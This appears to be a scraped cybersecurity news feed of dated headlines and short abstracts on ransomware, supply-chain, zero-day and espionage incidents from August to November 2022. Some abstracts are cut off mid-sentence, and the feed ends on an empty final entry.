A number of phishing campaigns are leveraging the decentralized Interplanetary Filesystem (IPFS) network to host malware, phishing kit infrastructure, and facilitate other attacks. "Multiple malware families are currently being hosted within IPFS and retrieved during the initial stages of malware attacks," Cisco Talos researcher Edmund Brumaghin said in an analysis shared with The Hacker News. The research mirrors similar findings from Trustwave SpiderLabs in July 2022, which found more than 3,000 emails containing IPFS phishing URLs as an attack vector, calling IPFS the new "hotbed" for hosting phishing sites. IPFS as a technology is both resilient to censorship and takedowns, making it a double-edged sword. Underlying it is a peer-to-peer (P2P) network which replicates content across all participating nodes so that even if content is removed from one machine, requests for the resources can still be served via other systems. This also makes it ripe for abuThe Hacker News
November 09, 2022
15,000 sites hacked for massive Google SEO poisoning campaign Full Text
Abstract
Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums.BleepingComputer
November 8, 2022
Medibank confirms ransomware attack impacting 9.7M customers, but doesn’t pay the ransom Full Text
Abstract
Australian health insurer Medibank confirmed that personal data belonging to around 9.7 million current and former customers were exposed as a result of a ransomware attack. Medibank announced that personal data belonging to around 9.7M of current...Security Affairs
November 7, 2022
Australia: LockBit ransomware gang hits Melbourne school Kilvington Grammar Full Text
Abstract
Data exfiltrated from independent co-educational Baptist institution Kilvington Grammar School by the LockBit ransomware gang has been posted on the dark web on October 14. LockBit only attacks Windows systems.IT Wire
November 3, 2022
250+ U.S. news sites spotted spreading FakeUpdates malware in a supply-chain attack Full Text
Abstract
Threat actors compromised a media company to deliver FakeUpdates malware through the websites of hundreds of newspapers in the US. Researchers at Proofpoint Threat Research observed threat actor TA569 intermittently injecting malicious code on a media...Security Affairs
November 03, 2022
LockBit ransomware claims attack on Continental automotive giant Full Text
Abstract
The LockBit ransomware gang has claimed responsibility for a cyberattack against the German multinational automotive group Continental.BleepingComputer
November 3, 2022
Black Basta Ransomware Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor Full Text
Abstract
SentinelLabs experts analyzed tools used by the ransomware gang in attacks, including some custom tools used for EDR evasion. SentinelLabs believes the developer of these tools is, or was, a developer for the FIN7 gang.Sentinel One
November 02, 2022
Hundreds of U.S. news sites push malware in supply-chain attack Full Text
Abstract
The compromised infrastructure of an undisclosed media company is being used by threat actors to deploy the SocGholish JavaScript malware framework (also known as FakeUpdates) on the websites of hundreds of newspapers across the U.S.BleepingComputer
October 31, 2022
Ransomware Attack on Australian Defense Contractor May Expose Private Communications Between ADF Members Full Text
Abstract
A ransomware attack may have resulted in data related to private communications between current and former Australian defense force members being compromised, with as many as 40,000 records at risk.The Guardian
October 31, 2022
Snatch group claims to have hacked military provider HENSOLDT France Full Text
Abstract
The Snatch ransomware group claims to have hacked HENSOLDT France, a company specializing in military and defense electronics. The Snatch ransomware group claims to have hacked the French company HENSOLDT France. HENSOLDT is a company specializing...Security Affairs
October 31, 2022
Indianapolis Low-Income Housing Agency Hit by Ransomware Attack Full Text
Abstract
The attack delayed the Indianapolis Housing Agency’s ability to send out October rent payments to landlords for the federal housing choice voucher program, also known as Section 8, which 8,000 Indianapolis families depend on.Security Week
October 31, 2022
DEV-0950 Uses Raspberry Robin Worm in Cl0p Ransomware Attacks Full Text
Abstract
The Raspberry Robin malware, which was initially spread via external USB drives, is now using additional infection methods and working with other malware families in its recent cyberattacks.Cyware Alerts - Hacker News
October 30, 2022
BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider Full Text
Abstract
The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than...Security Affairs
October 30, 2022
Air New Zealand warns of an ongoing credential stuffing attack Full Text
Abstract
Air New Zealand suffered a security breach; multiple customers have been locked out of their accounts after the incident. Air New Zealand suffered a security breach in which threat actors attempted to access customers' accounts by carrying out credential-stuffing...Security Affairs
October 29, 2022
A massive cyberattack hit Slovak and Polish Parliaments Full Text
Abstract
The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia's legislature was brought down. The authorities reported that a massive cyber attack hit the Slovak and Polish parliaments. The cyber attack brought...Security Affairs
October 28, 2022
IT Systems at Polish, Slovak Parliaments Hit by Cyberattacks Full Text
Abstract
"The attack was multi-directional, including from inside the Russian Federation," the Polish Senate said in a statement. The Slovak parliament's deputy speaker Gabor Grendel told AFP that "Parliament's entire computer network has been paralysed".Security Week
October 27, 2022
Australian Clinical Labs Suffers Major Hack Affecting 223,000 Accounts Full Text
Abstract
Medlab became aware of unauthorized third-party access to its IT system in February and a month later, was informed by the Australian Cyber Security Centre (ACSC) that it may have been the victim of a ransomware incident.Yahoo Finance
October 27, 2022
Twilio discloses another hack from June, blames voice phishing Full Text
Abstract
Cloud communications company Twilio disclosed a new data breach stemming from a June 2022 security incident where the same attackers behind the August hack accessed some customers' information.BleepingComputer
October 27, 2022
New York Post hacked with offensive headlines targeting politicians Full Text
Abstract
New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians.BleepingComputer
October 25, 2022
Emotet Launches Attacks with One-Click Attack Technique Full Text
Abstract
Trustwave SpiderLabs noted a spike in malspam campaigns by the Emotet botnet. In this attack wave, attackers are reportedly using invoice-themed phishing lures with password-protected archive files. These files drop CoinMiner and Quasar RAT to take over compromised systems.Cyware Alerts - Hacker News
October 25, 2022
Hackers hit cybersecurity conference in Australia Full Text
Abstract
The Australian Institute of Company Directors (AIDC) had some solid names lending support to the launch of the institute’s new set of “cybersecurity governance principles” but the event did not start on time due to the hacking incident.Sydney Morning Herald
October 24, 2022
Pendragon car dealer refuses $60 million LockBit ransomware demand Full Text
Abstract
Pendragon Group, with more than 200 car dealerships in the U.K., was breached in a cyberattack from the LockBit ransomware gang, who allegedly demanded $60 million to decrypt files and not leak them.BleepingComputer
October 23, 2022
Wholesale giant METRO confirmed to have suffered a cyberattack Full Text
Abstract
International cash and carry giant METRO suffered IT infrastructure outages this week following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000...Security Affairs
October 20, 2022
OldGremlin hackers use Linux ransomware to attack Russian orgs Full Text
Abstract
OldGremlin, one of the few ransomware groups attacking Russian corporate networks, has expanded its toolkit with file-encrypting malware for Linux machines.BleepingComputer
October 19, 2022
Chinese Hackers Targeting Online Casinos with GamePlayerFramework Malware Full Text
Abstract
An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years. Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet) and DRBControl, citing tactical and targeting similarities as well as the abuse of secure messaging clients. "Possibly we have a mix of espionage and [intellectual property] theft, but the true motivations remain a mystery," researchers Kurt Baumgartner and Georgy Kucherin said in a technical write-up published this week. The starting point of the investigation was in November 2021 when Kaspersky said it detected multiple PlugX loaders and other payloads that were deployed via an employee monitoring service and a security package deployment service. The initial infection method – the distribution of the framework through security solution packagesThe Hacker News
October 19, 2022
Hackers use new stealthy PowerShell backdoor to target 60+ victims Full Text
Abstract
A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities.BleepingComputer
October 17, 2022
Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted Full Text
Abstract
The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and...Security Affairs
October 17, 2022
Australian insurance firm Medibank confirms ransomware attack Full Text
Abstract
Health insurance provider Medibank has confirmed that a ransomware attack is responsible for last week's cyberattack and disruption of online services.BleepingComputer
October 17, 2022
Bulgaria hit by a cyber attack originating from Russia Full Text
Abstract
Government institutions in Bulgaria were hit by a cyber attack during the weekend; experts believe it was launched by Russian threat actors. The infrastructure of government institutions in Bulgaria has been hit by a massive DDoS attack. The attack...Security Affairs
October 17, 2022
Ransomware Actors Target a Major Indian Pharma Company Full Text
Abstract
Leaked data from Aarti Drugs includes business and administration data, including loan documents, and tax filing information. Whereas, stolen data from Ipca Laboratories includes employee records, formulation data, and financial and audit reports.The Times Of India
October 17, 2022
Japanese Tech firm Oomiya Hit by LockBit 3.0; Supply Chains Impacted Full Text
Abstract
LockBit 3.0 operators claim to have stolen data from the company and threaten to leak it by October 20, 2022 if the company does not pay the ransom. At this time, the ransomware gang has yet to publish samples of the alleged stolen documents.Security Affairs
October 16, 2022
Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug Full Text
Abstract
Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability,...Security Affairs
October 15, 2022
Indian Energy Company Tata Power’s IT Infrastructure Hit By Cyber Attack Full Text
Abstract
Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place security guardrails for customer-facing portals to prevent unauthorized access. The Mumbai-based electric utility company, part of the Tata Group conglomerate, did not disclose any further details about the nature of the attack, or when it took place. That said, cybersecurity firm Recorded Future in April disclosed attacks mounted by China-linked adversaries targeting Indian power grid organizations. The network intrusions are said to have been aimed at "at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electThe Hacker News
October 15, 2022
Almost 900 servers hacked using Zimbra zero-day flaw Full Text
Abstract
Almost 900 servers have been hacked using a critical Zimbra Collaboration Suite (ZCS) vulnerability, which at the time was a zero-day without a patch for nearly 1.5 months.BleepingComputer
October 15, 2022
Indian power generation giant Tata Power hit by a cyber attack Full Text
Abstract
Tata Power Company Limited, India's largest power generation company, announced it was hit by a cyberattack. Tata Power on Friday announced that it was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The...Security Affairs
October 15, 2022
Tata Power, a top power producer in India, confirms cyberattack Full Text
Abstract
Tata Power, a leading power generation company in India, has confirmed it was hit by a cyberattack. In a brief statement, the Mumbai-based company said that the attack impacted some of its IT systems.Tech Crunch
October 13, 2022
Fast Company says Executive Board member info was not stolen in attack Full Text
Abstract
American business magazine Fast Company reached out to its Executive Board members this week to let them know their personal information was not stolen in a September 27 cyberattack that forced it to shut down its website.BleepingComputer
October 13, 2022
Mango Markets Loses Over $100 Million in Flash Loan Attack Full Text
Abstract
Mango Markets took to Twitter Tuesday evening to tell users that it was investigating an incident “where a hacker was able to drain funds from Mango via… price manipulation.”The Record
October 10, 2022
New Report Uncovers Emotet’s Delivery and Evasion Techniques Used in Recent Attacks Full Text
Abstract
Threat actors associated with the notorious Emotet malware are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection, according to new research from VMware. Emotet is the work of a threat actor tracked as Mummy Spider (aka TA542), emerging in June 2014 as a banking trojan before morphing into an all-purpose loader in 2016 that's capable of delivering second-stage payloads such as ransomware. While the botnet's infrastructure was taken down as part of a coordinated law enforcement operation in January 2021, Emotet bounced back in November 2021 through another malware known as TrickBot. Emotet's resurrection, orchestrated by the now-defunct Conti team, has since paved the way for Cobalt Strike infections and, more recently, ransomware attacks involving Quantum and BlackCat. "The ongoing adaptation of Emotet's execution chain is one reason the malware has been successful for so long," researchers from VMwaThe Hacker News
October 10, 2022
Australian Firm Costa Group Suffers Phishing Attack Full Text
Abstract
Australian fruit and vegetable supplier Costa Group says it was subjected to a malicious and sophisticated phishing attack in August that resulted in unauthorized access to its servers.Bank Info Security
October 10, 2022
Harvard Business Publishing licensee hit by ransomware Full Text
Abstract
Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data...Security Affairs
October 9, 2022
CommonSpirit hospital chains hit by ransomware, patients are facing problems Full Text
Abstract
CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe...Security Affairs
October 9, 2022
Lloyd’s of London investigates alleged cyber attack Full Text
Abstract
Lloyd's of London launched an investigation on Wednesday into a possible cyber attack after detecting unusual activity on its network. Lloyd's of London is investigating a cyberattack after detecting unusual network activity this week. In response...Security Affairs
October 8, 2022
State Bar of Georgia Notifies Members and Employees of Cybersecurity Incident Full Text
Abstract
The State Bar of Georgia announced that it experienced a cybersecurity incident that resulted in unauthorized access to its systems. After learning of the incident, the State Bar worked to restore its systems safely and resume normal operations.Dark Reading
October 7, 2022
Cyberattack Impacts City of Dunedin’s Email, Permit Payments, Utility Billing, and Inspection Scheduling Full Text
Abstract
Dunedin's water and wastewater facilities are secure, and city phones are working. However, city email, online payments for permits, inspection scheduling, utility billing, Parks & Recreation programs, and Marina fees are all not working.USF
October 6, 2022
Lloyd’s of London investigates possible cyber attack Full Text
Abstract
"Lloyd’s has detected unusual activity on its network and we are investigating the issue," a Lloyd's spokesperson said by email, adding that the market was resetting the network.Reuters
October 5, 2022
New Zealand: Cyberattack on health provider Pinnacle potentially impacts thousands of patients’ data Full Text
Abstract
Health workers are scrambling to deal with a cyber attack that has compromised details kept by Waikato and Bay of Plenty health provider Pinnacle, which operates dozens of GP practices.Stuff NZ
October 03, 2022
Comm100 Chat Provider Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
A threat actor likely with associations to China has been attributed to a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike said the attack made use of a signed Comm100 desktop agent app for Windows that was downloadable from the company's website. The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. Comm100 is a Canadian provider of live audio/video chat and customer engagement software for enterprises. It claims to have more than 15,000 customers across 51 countries. "The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate," the company noted, adding it remained available until September 29. EThe Hacker News
September 30, 2022
Update: Vice Society raises ransomware pressure on Los Angeles school district Full Text
Abstract
The threat, which was discovered and published on Twitter by Brett Callow from Emsisoft, effectively gives the Los Angeles school district less than four days to respond. Vice Society did not include any details about the data it plans to publish.Cybersecurity Dive
September 30, 2022
Cyber Attacks Against Middle East Governments Hide Malware in Windows logo Full Text
Abstract
An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments. Broadcom's Symantec Threat Hunter Team attributed the updated tooling to a hacking group it tracks under the name Witchetty, which is also known as LookingFrog, a subgroup operating under the TA410 umbrella. Intrusions involving TA410 – which is believed to share connections with a Chinese threat group known as APT10 (aka Cicada, Stone Panda, or TA429) – primarily feature a modular implant called LookBack. Symantec's latest analysis of attacks between February and September 2022, during which the group targeted the governments of two Middle Eastern countries and the stock exchange of an African nation, highlights the use of a new backdoor called Stegmap. The new malware leverages steganography – a technique used to embed a message (in this case, malware) in a non-secret docThe Hacker News
September 30, 2022
New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons Full Text
Abstract
A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts. "The payload discovered is a leaked version of a Cobalt Strike beacon," Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday. "The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic." The malicious activity, discovered in August 2022, attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office that allows an attacker to take control of an affected system. The entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. government and PublThe Hacker News
September 30, 2022
Microsoft confirms new Exchange zero-days are used in attacks Full Text
Abstract
Microsoft has confirmed that two recently reported zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019 are being exploited in the wild.BleepingComputer
September 30, 2022
WARNING: New Unpatched Microsoft Exchange Zero-Day Under Active Exploitation Full Text
Abstract
Security researchers are warning of previously undisclosed flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems. That's according to Vietnamese cybersecurity company GTSC, which discovered the shortcomings as part of its security monitoring and incident response efforts in August 2022. The two vulnerabilities, which are formally yet to be assigned CVE identifiers, are being tracked by the Zero Day Initiative as ZDI-CAN-18333 (CVSS score: 8.8) and ZDI-CAN-18802 (CVSS score: 6.3). GTSC said that successful exploitation of the flaws could be abused to gain a foothold in the victim's systems, enabling adversaries to drop web shells and carry out lateral movements across the compromised network. "We detected web shells, mostly obfuscated, being dropped to Exchange servers," the company noted. "Using the user-agent, we detected that the attacker useThe Hacker News
September 29, 2022
New Microsoft Exchange zero-days actively exploited in attacks Full Text
Abstract
Threat actors are exploiting yet-to-be-disclosed Microsoft Exchange zero-day bugs allowing for remote code execution, according to claims made by security researchers at Vietnamese cybersecurity outfit GTSC, who first spotted and reported the attacks.BleepingComputer
September 29, 2022
Researchers Uncover Covert Attack Campaign Targeting Military Contractors Full Text
Abstract
A new covert attack campaign singled out multiple military and weapons contractor companies with spear-phishing emails to trigger a multi-stage infection process designed to deploy an unknown payload on compromised machines. The highly-targeted intrusions, dubbed STEEP#MAVERICK by Securonix, also targeted a strategic supplier to the F-35 Lightning II fighter aircraft. "The attack was carried out starting in late summer 2022 targeting at least two high-profile military contractor companies," Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in an analysis. Infection chains begin with a phishing mail with a ZIP archive attachment containing a shortcut file that claims to be a PDF document about "Company & Benefits," which is then used to retrieve a stager -- an initial binary that's used to download the desired malware -- from a remote server. This PowerShell stager sets the stage for a "robust chain of stagers" that progresses through seven mThe Hacker News
September 28, 2022
High-Profile Hacks Show Effectiveness of MFA Fatigue Attacks Full Text
Abstract
MFA provides an extra layer of security for user accounts. If a threat actor can obtain an account’s username and password through phishing or other methods, MFA should prevent them from accessing the account.Security Week
September 28, 2022
Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks Full Text
Abstract
The relatively new Bl00Dy Ransomware Gang has started to use a recently leaked LockBit ransomware builder in attacks against companies.BleepingComputer
September 27, 2022
Pass-the-Hash Attacks and How to Prevent them in Windows Domains Full Text
Abstract
Hackers often start out with nothing more than a low-level user account and then work to gain additional privileges that will allow them to take over the network. One of the methods that is commonly used to acquire these privileges is a pass-the-hash attack. Here are five steps to prevent a pass-the-hash attack in a Windows domain.BleepingComputer
September 25, 2022
OpIran: Anonymous declares war on Teheran amid Mahsa Amini’s death Full Text
Abstract
OpIran: Anonymous launched Operation Iran against Teheran due to the ongoing crackdown on dissent after Mahsa Amini’s death. Anonymous launched OpIran against Iran due to the ongoing crackdown on dissent after Mahsa Amini’s death. The protests...Security Affairs
September 24, 2022
Microsoft SQL servers hacked in TargetCompany ransomware attacks Full Text
Abstract
Security analysts at ASEC have discovered a new wave of attacks targeting vulnerable Microsoft SQL servers, involving the deployment of a ransomware strain named FARGO.BleepingComputer
September 23, 2022
UK Police arrests teen believed to be behind Uber, Rockstar hacks Full Text
Abstract
The City of London police announced on Twitter today the arrest of a British 17-year-old teen suspected of being involved in recent cyberattacks.BleepingComputer
September 23, 2022
Anonymous claims to have hacked the website of the Russian Ministry of Defense Full Text
Abstract
The popular collective Anonymous claims to have hacked the website of the Russian Ministry of Defense and leaked data of 305,925 people. The #OpRussia campaign launched by Anonymous against Russia after the criminal invasion of Ukraine continues, the popular...Security Affairs
September 23, 2022
Sophos warns of new firewall RCE bug exploited in attacks Full Text
Abstract
Sophos warned today that a critical code injection security vulnerability in the company's Firewall product is being exploited in the wild.BleepingComputer
September 20, 2022
Uber believes that the LAPSUS$ gang is behind the recent attack Full Text
Abstract
Uber disclosed additional details about the security breach; the company blames a threat actor allegedly affiliated with the LAPSUS$ hacking group. Uber revealed additional details about the recent security breach, and the company believes that the threat...Security Affairs
September 20, 2022
Bosnia and Herzegovina Investigating Alleged Ransomware Attack on Parliament Full Text
Abstract
While the prosecutor would not say what type of attack it is, sources confirmed to Nezavisne that it involved ransomware. The Sarajevo Times reported that the main server of parliament was shut off after the attack.The Record
September 19, 2022
New Gamaredon Campaign Targets Ukrainian entities with New Info-stealer Full Text
Abstract
A new cyberespionage campaign by Gamaredon is targeting employees from the Ukrainian government, law enforcement, and defense agencies, with custom-made malware. Researchers claim that its new infostealer is capable of stealing files from attached storage devices (local and remote).Cyware Alerts - Hacker News
September 15, 2022
Russian hackers use new info stealer malware against Ukrainian orgs Full Text
Abstract
Russian hackers have been targeting Ukrainian entities with previously unseen info-stealing malware during a new espionage campaign that is still active.BleepingComputer
September 15, 2022
Webworm hackers modify old malware in new attacks to evade attribution Full Text
Abstract
Chinese cyberespionage hackers of the 'Webworm' group are undergoing experimentation, using modified decade-old RATs (remote access trojans) in the wild.BleepingComputer
September 13, 2022
Asian Governments and Organizations Targeted in Latest Cyber Espionage Attacks Full Text
Abstract
Government and state-owned organizations in a number of Asian countries have been targeted by a distinct group of espionage hackers as part of an intelligence gathering mission that has been underway since early 2021. "A notable feature of these attacks is that the attackers leveraged a wide range of legitimate software packages in order to load their malware payloads using a technique known as DLL side-loading," the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. The campaign is said to be exclusively geared towards government institutions related to finance, aerospace, and defense, as well as state-owned media, IT, and telecom firms. Dynamic-link library (DLL) side-loading is a popular cyberattack method that leverages how Microsoft Windows applications handle DLL files. In these intrusions, a spoofed malicious DLL is planted in the Windows Side-by-Side (WinSxS) directory so that the operating system loads itThe Hacker News
September 13, 2022
Iran-linked TA453 used new Multi-Persona Impersonation technique in recent attacks Full Text
Abstract
Iran-linked threat actors target individuals specializing in Middle Eastern affairs, nuclear security and genome research. In mid-2022, Proofpoint researchers uncovered a cyberespionage campaign conducted by Iran-linked TA453 threat actors. The...Security Affairs
September 13, 2022
Montenegro and its allies are working to recover from the massive cyber attack Full Text
Abstract
A massive cyberattack hit Montenegro; officials believe that it was launched by pro-Russian hackers and the security services of Moscow. A massive cyberattack hit Montenegro, and the offensive forced government headquarters to disconnect the systems from...Security Affairs
September 13, 2022
Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel Full Text
Abstract
The hacktivist collective GhostSec claimed to have compromised 55 Berghof PLCs used by Israeli organizations. Pro-Palestinian Hacking Group GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations...Security Affairs
September 12, 2022
Hackers steal Steam accounts in new Browser-in-the-Browser attacks Full Text
Abstract
Hackers are launching new attacks to steal Steam credentials using a Browser-in-the-Browser phishing technique that is rising in popularity among threat actors.BleepingComputer
September 12, 2022
China Accuses NSA’s TAO Unit of Hacking its Military Research University Full Text
Abstract
China has accused the U.S. National Security Agency (NSA) of conducting a string of cyberattacks aimed at aeronautical and military research-oriented Northwestern Polytechnical University in the city of Xi'an in June 2022. The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week, and accused the Office of Tailored Access Operations (TAO) at the USA's National Security Agency (NSA) of orchestrating thousands of attacks against the entities located within the country. "The U.S. NSA's TAO has carried out tens of thousands of malicious cyber attacks on China's domestic network targets, controlled tens of thousands of network devices (network servers, Internet terminals, network switches, telephone exchanges, routers, firewalls, etc.), and stole more than 140GB of high-value data," the NCVERC said. The agency further said that the attack on the Northwestern Polytechnical University employed no fewer than 40 differentThe Hacker News
September 11, 2022
Albania was hit by a new cyberattack and blames Iran Full Text
Abstract
Albania blamed Iran for a new cyberattack that hit computer systems used by the state police on Friday. Albania blamed the government of Teheran for a new cyberattack that hit computer systems used by the state police on Saturday. "The national...Security Affairs
September 10, 2022
IHG suffered a cyberattack that severely impacted its booking process Full Text
Abstract
InterContinental Hotels Group PLC (IHG) discloses a security breach: parts of its IT infrastructure have been subject to unauthorised activity. The hospitality conglomerate, InterContinental Hotels Group (IHG), manages 17 hotel chains, including the Regent,...Security Affairs
September 09, 2022
Vice Society claims LAUSD ransomware attack, theft of 500GB of data Full Text
Abstract
The Vice Society gang has claimed the ransomware attack that hit Los Angeles Unified (LAUSD), the second largest school district in the United States, over the weekend.BleepingComputer
September 9, 2022
Update: Vice Society ransomware claims credit for Los Angeles school attack Full Text
Abstract
The ransomware outfit known as Vice Society has claimed credit for an attack earlier this week that disabled several IT systems at the Los Angeles Unified School District, according to a report.State Scoop
September 08, 2022
GIFShell attack creates reverse shell using Microsoft Teams GIFs Full Text
Abstract
A new attack technique called 'GIFShell' allows threat actors to abuse Microsoft Teams for novel phishing attacks and covertly executing commands to steal data using ... GIFs.BleepingComputer
September 08, 2022
Hackers Repeatedly Targeting Financial Services in French-Speaking African Countries Full Text
Abstract
Major financial and insurance companies located in French-speaking nations in Africa have been targeted over the past two years as part of a persistent malicious campaign codenamed DangerousSavanna. Countries targeted include Ivory Coast, Morocco, Cameroon, Senegal, and Togo, with the spear-phishing attacks heavily focusing on Ivory Coast in recent months, Israeli cybersecurity firm Check Point said in a Tuesday report. Infection chains entail targeting employees of financial institutions with social engineering messages containing malicious attachments as a means of initial access, ultimately leading to the deployment of off-the-shelf malware such as Metasploit, PoshC2, DWservice, and AsyncRAT. "The threat actors' creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaderThe Hacker News
September 7, 2022
Nearly 5 Million Attacks Blocked Targeting 0-Day in BackupBuddy Plugin Full Text
Abstract
Late evening, on September 6, 2022, the Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in BackupBuddy, a WordPress plugin we estimate has around 140,000 active installations.Wordfence
September 07, 2022
200,000 North Face accounts hacked in credential stuffing attack Full Text
Abstract
Outdoor apparel brand 'The North Face' was targeted in a large-scale credential stuffing attack that has resulted in the hacking of 194,905 accounts on the thenorthface.com website.BleepingComputer
September 07, 2022
Albania blames Iran for July cyberattack, severs diplomatic ties Full Text
Abstract
Albanian Prime Minister Edi Rama announced on Wednesday that the entire staff of the Embassy of the Islamic Republic of Iran was asked to leave within 24 hours.BleepingComputer
September 07, 2022
Google says former Conti ransomware members now attack Ukraine Full Text
Abstract
Google says some former Conti cybercrime gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs).BleepingComputer
September 6, 2022
The Los Angeles Unified School District hit by a ransomware attack Full Text
Abstract
One of the largest US school districts, the Los Angeles Unified School District, suffered a ransomware attack during the weekend. The Los Angeles Unified School District is one of the largest school districts in the US; it was hit by a ransomware attack...Security Affairs
September 05, 2022
TikTok denies security breach after hackers leak user data, source code Full Text
Abstract
TikTok denies recent claims it was breached, and source code and user data were stolen, telling BleepingComputer that data posted to a hacking forum is "completely unrelated" to the company.BleepingComputer
September 4, 2022
Anonymous hacked Yandex taxi causing a massive traffic jam in Moscow Full Text
Abstract
The popular collective Anonymous and the IT Army of Ukraine hacked the Yandex Taxi app, causing a massive traffic jam in Moscow. This week Anonymous announced that it had hacked the Yandex Taxi app, the largest taxi service in Russia, and used it to cause...Security Affairs
September 02, 2022
Damart clothing store hit by Hive ransomware, $2 million demanded Full Text
Abstract
Damart, a French clothing company with over 130 stores across the world, is being extorted for $2 million after a cyberattack from the Hive ransomware gang.BleepingComputer
September 2, 2022
Attack infrastructure used in Cisco hack linked to Evil Corp affiliate Full Text
Abstract
Researchers discovered that the infrastructure used in the Cisco hack was the same used to target a Workforce Management Solution firm. Researchers from cybersecurity firm eSentire discovered that the attack infrastructure used in the recent Cisco hack was also...Security Affairs
September 01, 2022
New ransomware hits Windows, Linux servers of Chile govt agency Full Text
Abstract
Chile's national computer security and incident response team (CSIRT) has announced that a ransomware attack has impacted operations and online services of a government agency in the country.BleepingComputer
September 01, 2022
Montenegro hit by ransomware attack, hackers demand $10 million Full Text
Abstract
The government of Montenegro has admitted that its previous allegations about Russian threat actors attacking critical infrastructure in the country were false and now blames ransomware for the damage to its IT infrastructure that has caused extensive service disruptions.BleepingComputer
September 1, 2022
Migration Policy Organization Confirms Cyberattack After Extortion Group Touts Data Theft Full Text
Abstract
The organization is in the process of investigating what information was compromised, according to Bernhard Schragl, communication coordinator for ICMPD, who added that they have reported the incident to law enforcement agencies.The Record
September 01, 2022
Infra Used in Cisco Hack Also Targeted Workforce Management Solution Full Text
Abstract
The attack infrastructure used to target Cisco in the May 2022 incident was also employed against an attempted compromise of an unnamed workforce management solutions holding company a month earlier in April 2022. Cybersecurity firm eSentire, which disclosed the findings, raised the possibility that the intrusions could be the work of a criminal actor known as mx1r, who is said to be a member of the Evil Corp affiliate cluster dubbed UNC2165. Evil Corp, the progenitors of the infamous Dridex banking trojan, have, over the years, refined their modus operandi to run a series of ransomware operations to sidestep sanctions imposed by the U.S. Treasury in December 2019. Initial access to the company's IT network was made possible by using stolen Virtual Private Network (VPN) credentials, followed by leveraging off-the-shelf tools for lateral movement and gaining deeper access into the victim's environment. "Using Cobalt Strike, the attackers were able to gain an initThe Hacker News
September 1, 2022
Ransomware Attacks Target Chilean Government Agencies Through Windows and VMware ESXi Servers Full Text
Abstract
Chile’s Ministry of Interior reported last week that a government agency had its systems and online services disrupted by a piece of ransomware that targeted Windows and VMware ESXi servers.Security Week
August 31, 2022
Ragnar Locker ransomware claims attack on Portugal’s flag airline Full Text
Abstract
The Ragnar Locker ransomware gang has claimed an attack on the flag carrier of Portugal, TAP Air Portugal, disclosed by the airline last Friday.BleepingComputer
August 31, 2022
Update: Cuba Ransomware Apparently Involved in Russia-Linked Attack on Montenegro Government Full Text
Abstract
